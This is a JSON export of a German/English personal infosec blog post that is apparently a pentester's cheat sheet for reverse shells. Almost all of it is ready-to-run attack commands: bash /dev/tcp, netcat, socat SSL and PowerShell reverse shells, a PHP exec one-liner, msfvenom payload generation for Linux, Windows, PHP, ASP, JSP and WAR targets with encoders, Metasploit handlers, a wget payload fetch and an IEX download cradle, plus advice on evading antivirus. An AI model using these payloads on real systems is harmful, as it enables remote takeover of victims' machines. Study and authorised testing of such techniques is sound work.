{"id":224,"date":"2019-08-14T10:44:24","date_gmt":"2019-08-14T08:44:24","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=224"},"modified":"2023-12-24T13:05:30","modified_gmt":"2023-12-24T12:05:30","slug":"reverse-shell","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=224","title":{"rendered":"Reverse Shell&nbsp;<span class=\"caps\">ALT<\/span>"},"content":{"rendered":"<pre>IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM.<\/pre>\n<h3>Aufbauen<\/h3>\n<ul>\n \t<li>&nbsp;Lausche auf einem Sys\u00adtem, dass erre\u00adicht wer\u00adden kann z.B.&nbsp;mit<\/li>\n<\/ul>\n<pre>nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution]<\/pre>\n<ul>\n \t<li>Ini\u00adti\u00adiere dann die Verbindung vom Ziel\u00adsys\u00adtem. Hier ein Beispiel direkt in&nbsp;<span class=\"caps\">PHP<\/span>:<\/li>\n<\/ul>\n<pre>&lt;?php exec(\"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.0.0.10\/1234 0&gt;&amp;1'\"); ?&gt;<\/pre>\nAnderes Beispiel, z.B. direkt in ein\u00ader Kon\u00adsole aus\u00adf\u00fchrbar:\n<pre>nc -e \/bin\/sh 10.0.3.4 4444<\/pre>\nInter\u00adest\u00ading oth\u00ader approach e.g. if nc. does\u00adn\u2019t has the \u2011e flag:\n<pre class=\"hr hs ht hu hv hw hx hy\"><span id=\"d401\" class=\"fc hz ia eg ib b dd ic id s ie\" data-selectable-paragraph>mknod \/tmp\/backpipe p\n\/bin\/sh 0&lt;\/tmp\/backpipe | nc <strong class=\"ib co\">$attackerip<\/strong> 4444 1&gt;\/tmp\/backpipe<\/span><\/pre>\n<h3>Verbessern<\/h3>\nrlwrap verbessert die Shell:\n<pre>rlwrap nc ...<\/pre>\n<h3>With socat and&nbsp;<span class=\"caps\">SSL<\/span><\/h3>\nFirst, cre\u00adate a cer\u00adtifi\u00adcate and com\u00adbine it into a <span class=\"caps\">PEM<\/span> file.\n<pre>openssl req -newkey rsa:4096 -nodes -keyout bind_shell.key -x509 -days 42 -out bind_shell.crt\ncat bind_shell.key bind_shell.crt &gt; bind_shell.pem<\/pre>\n<h4>Reverse shell on Linux, receiving on Windows<\/h4>\nThen, bind a shell on Lin\u00adux\n<pre>socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:\/bin\/bash<\/pre>\nAnd open it from Wind\u00adwows\n<pre>socat.exe - OPENSSL:192.168.119.158,verify=0<\/pre>\n<h4>Reverse shell on Windows, receiving on&nbsp;Linux<\/h4>\nOpen the lis\u00adten\u00ader on Win\u00addows\n<pre>socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:'cmd.exe',pipes<\/pre>\nOpen it from Lin\u00adux\n<pre>socat - OPENSSL:192.168.119.158:443,verify=0<\/pre>\n<h3>Windows<\/h3>\n<ol>\n \t<li>Upload nc.exe<\/li>\n \t<li>Local: Start lis\u00adten\u00ader&nbsp;like&nbsp;<ol>\n \t<li>\n<pre>rlwrap nc -lvp 4444<\/pre>\n<\/li>\n<\/ol>\n<\/li>\n \t<li>Remote: export shell&nbsp;like&nbsp;<ol>\n \t<li>\n<pre>nc.exe -e cmd.exe 10.10.14.37 4444<\/pre>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\nAlternative&nbsp;<ol>\n \t<li>Upload nc.exe<\/li>\n \t<li>Vic\u00adtim: Start the net\u00adcat lis\u00adten\u00ader\n<pre>nc -dLp 4444 -e cmd.exe<\/pre>\n<\/li>\n \t<li>Local: in Metas\u00adploit:\n<pre>use multi\/handler\nset LPORT 4444\nset RHOST $victim\nset PAYLOAD payload\/windows\/x64\/shell_bind_tcp\nrun<\/pre>\n<\/li>\n<\/ol>\n<h3>M\u00f6gliche Probleme<\/h3>\nWenn in ein\u00ader Reverse-Shell die Pass\u00adwort-Eingabe nicht klappt\u2026&nbsp;<!-- \/wp:post-content -->\n\n<!-- wp:paragraph -->\n<pre>sudo: no tty present and no askpass program specified<\/pre>\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\n\u2026 muss eine <span class=\"caps\">TTY<\/span> shell aufgemacht wer\u00adden. M\u00f6glichkeiten:&nbsp;<ul>\n \t<li><a href=\"http:\/\/netsec.ws\/?p=337\">http:\/\/netsec.ws\/?p=337<\/a><\/li>\n \t<li><a href=\"https:\/\/blog.ropnop.com\/upgrading-simple-shells-to-fully-interactive-ttys\/\">https:\/\/blog.ropnop.com\/upgrading-simple-shells-to-fully-interactive-ttys\/<\/a><\/li>\n<\/ul>\n<h3>Generate<\/h3>\n<div>Bina\u00adry exe\u00adcutable for&nbsp;Linux:<\/div>\n<pre>msfvenom -p linux\/x86\/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf &gt; shell.elf\nmsfvenom -p linux\/x64\/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf &gt; shell.elf<code><\/code><\/pre>\n<div>Bina\u00adry meter\u00adpreter exe\u00adcutable for&nbsp;Linux:<\/div>\n<div>\n<pre>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf &gt; shell.elf\nmsfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf &gt; shell.elf<\/pre>\n<\/div>\n<div>Perl reverse shell<\/div>\n<pre>msfvenom -p cmd\/unix\/reverse_perl LHOST=10.11.0.174 LPORT=4444 -f raw<\/pre>\n<div>Python reverse shell<\/div>\n<div>\n<pre>msfvenom -p cmd\/unix\/reverse_python LHOST=10.11.0.174 LPORT=4444 -f raw<\/pre>\n<\/div>\n<div><span class=\"caps\">PHP<\/span> reverse shell<\/div>\n<pre>msfvenom -p php\/reverse_php LHOST=10.11.0.174 LPORT=4444 -f raw<\/pre>\n<div><span class=\"caps\">PHP<\/span> meter\u00adpreter (Should this not work because a shell in meter\u00adpreter won\u2019t work, use nc to export the bash to a local nc listener.)<\/div>\n<pre>msfvenom -p php\/meterpreter\/reverse_tcp LHOST=10.11.0.174 LPORT=4444 -f raw<\/pre>\n<div>ASP-Reverse-Shell<\/div>\n<pre>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.119.158 LPORT=4444 -f asp &gt; s.asp<\/pre>\n<div>Tomcat\/<span class=\"caps\">WAR<\/span> reverse shell<\/div>\n<div>msfven\u00adom \u2011p java\/jsp_shell_reverse_tcp <span class=\"caps\">LHOST<\/span>=&lt;Local <span class=\"caps\">IP<\/span> Address&gt; <span class=\"caps\">LPORT<\/span>=&lt;Local Port&gt; \u2011f war &gt; shell.war<\/div>\n<div><\/div>\n<div>Pow\u00ader\u00adShell reverse shell<\/div>\n<pre>msfvenom -p windows\/x64\/meterpreter_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f psh --out reverse_shell.ps1<\/pre>\n<div>(If this does\u00adn\u2019t work, use the make_reverse_powershell.py script <a href=\"https:\/\/gist.github.com\/tothi\/ab288fb523a4b32b51a53e542d40fe58\">or the orig\u00adi\u00adnal from here<\/a>.)<\/div>\n<div><span class=\"caps\">JSP<\/span> reverse shell<\/div>\n<pre>msfvenom -p java\/jsp_shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f raw &gt; rs.jsp<\/pre>\n<div>Dann mit Metasploit:<\/div>\n<div>\n<div class=\"page\" title=\"Page 40\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>&gt; use multi\/handler\n&gt; set PAYLOAD php\/meterpreter\/reverse_tcp\n&gt; set LHOST 10.10.10.10\n&gt; set LPORT 4444\n&gt; exploit\n<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\nHex out\u00adput: use \u2011hex h.hex param\n<h2>Windows<\/h2>\n<div>Win\u00addows <em>reverse<\/em> shell for metasploit:<\/div>\n<pre>msfvenom -a x86 --platform windows -p windows\/shell\/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o \/tmp\/p32.exe\nmsfvenom -a x64 --platform windows -p windows\/x64\/shell\/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o \/tmp\/p64.exe<\/pre>\n<div>Win\u00addows <em>bind<\/em> shell (needs to have run\u00adning nc \u2011lvp&nbsp;443)<\/div>\n<div>\n<pre class=\"precode\">msfvenom -p windows\/shell_reverse_tcp lhost=192.168.119.158 lport=443 -f exe &gt; root.exe<\/pre>\n<\/div>\n<div>Win\u00addows reverse meter\u00adpreter shell for metasploit:<\/div>\n<pre>msfvenom --platform windows -p windows\/meterpreter\/reverse_tcp LHOST=192.168.119.158 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o \/tmp\/p32.exe\nmsfvenom -a x64 --platform windows -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o \/tmp\/p64.exe<\/pre>\n<div>Win\u00addows reverse shell for&nbsp;nc:<\/div>\n<div>\n<pre>msfvenom -a x86 --platform windows -p windows\/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o p32.exe\nmsfvenom -a x64 --platform windows -p windows\/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b \"\\x00\" -e x86\/shikata_ga_nai -f exe -o p64.exe<\/pre>\n<\/div>\n<div><strong>If all of this does\u00adn\u2019t work, switch to nc binding!<\/strong><\/div>\n<div>Oth\u00ader sources for web shells: https:\/\/tools.kali.org\/maintaining-access\/webshells<\/div>\n<div>Use <a href=\"https:\/\/github.com\/GreatSCT\/GreatSCT\">GreatSCT<\/a> if you have prob\u00adlems with anti-virus solutions.<\/div>\n<div><\/div>\n<h3><span class=\"caps\">PHP<\/span><\/h3>\n<div>Cle\u00advere Idee: Nur Down\u00adload verur\u00adsachen bei Aus\u00adf\u00fchrung, dann ist die Datei irgend\u00adwo vor&nbsp;Ort.<\/div>\n<pre>&lt;?php system(\"\/usr\/local\/bin\/wget http:\/\/10.11.0.174\/r.php -O \/usr\/local\/www\/apache24\/data\/r.php\") ?&gt;<\/pre>\n<h3>PowerShell<\/h3>\n<div>Lis\u00adten nor\u00admal\u00adly with nc, then, on the vic\u00adtim you can start a reverse shell han\u00addler natively:<\/div>\n<div>\n<div class=\"page\" title=\"Page 89\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()\"<\/pre>\nAlter\u00adna\u00adtive: Use <a href=\"https:\/\/github.com\/besimorhino\/powercat\">Pow\u00ader\u00adcat<\/a> on an own sys\u00adtem. Cre\u00adate encod\u00aded reverse shell code as follows:&nbsp;<div class=\"page\" title=\"Page 94\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge &gt; encodedreverseshell. ps1<\/pre>\nStart now a nc lis\u00adten\u00ader as usu\u00adal. Then, on the vic\u00adtim, just exe\u00adcute the base64 encod\u00aded&nbsp;code:&nbsp;<div class=\"page\" title=\"Page 94\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>powershell.exe -E ZgB1AG4AYwB0AGkAb...<\/pre>\n<h3>Unicorn<\/h3>\nCre\u00adate reverse shell code\n<pre>unicorn.py windows\/meterpreter\/reverse_http $local_ip $local_port<\/pre>\nThis cre\u00adates a powershell_attack.txt.\n<ol>\n \t<li>Copy this file togeth\u00ader with unicorn.rc in a directory.<\/li>\n \t<li>Start metas\u00adploit with msf\u00adcon\u00adsole \u2011r unicorn.rc<\/li>\n \t<li>In anoth\u00ader ter\u00admi\u00adnal, start a web serv\u00ader which can deliv\u00ader the powershell_attack.txt file<\/li>\n \t<li>On the vic\u00adtim, exe\u00adcute the following&nbsp;<ol>\n \t<li>pow\u00ader\u00adshell \u201c<span class=\"caps\">IEX<\/span>(New-Object Net.webclient).downloadstring(\u2018http:\/\/local:port\/powershell_attack.txt\u2019)\u201d<\/li>\n<\/ol>\n<\/li>\n \t<li>A shell is not open in Metasploit.<\/li>\n<\/ol>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p><span class=\"caps\">IF<\/span> <span class=\"caps\">THE<\/span> <span class=\"caps\">METERPRETER<\/span> <span class=\"caps\">SHELL<\/span> <span class=\"caps\">STUCKS<\/span>, <span class=\"caps\">TRY<\/span> <span class=\"caps\">TO<\/span> <span class=\"caps\">ENTER<\/span> <span class=\"caps\">ENTER<\/span> <span class=\"caps\">MULTIPLE<\/span> <span class=\"caps\">TIMES<\/span> <span class=\"caps\">ON<\/span> <span class=\"caps\">THE<\/span> <span class=\"caps\">VICTIM<\/span>. Auf\u00adbauen &nbsp;Lausche auf einem Sys\u00adtem, dass erre\u00adicht wer\u00adden kann z.B.&nbsp;mit nc \u2011lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Ini\u00adti\u00adiere dann die Verbindung vom Ziel\u00adsys\u00adtem. Hier ein Beispiel direkt in&nbsp;<span class=\"caps\">PHP<\/span>: &lt;?php exec(\u201c\/bin\/bash \u2011c \u2018bash \u2011i &gt;<span class=\"amp\">&amp;<\/span> \/dev\/tcp\/10.0.0.10\/1234 0&gt;<span class=\"amp\">&amp;<\/span>1\u2019&nbsp;\u201d); ?&gt; Anderes Beispiel, z.B. direkt in ein\u00ader Konsole&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470],"tags":[56,59,46,58,57],"class_list":["post-224","post","type-post","status-publish","format-standard","hentry","category-active-enum","tag-reverse-shell","tag-shell","tag-ssh","tag-su","tag-sudo"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/224","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=224"}],"version-history":[{"count":48,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/224\/revisions"}],"predecessor-version":[{"id":2289,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/224\/revisions\/2289"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=224"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=224"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=224"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}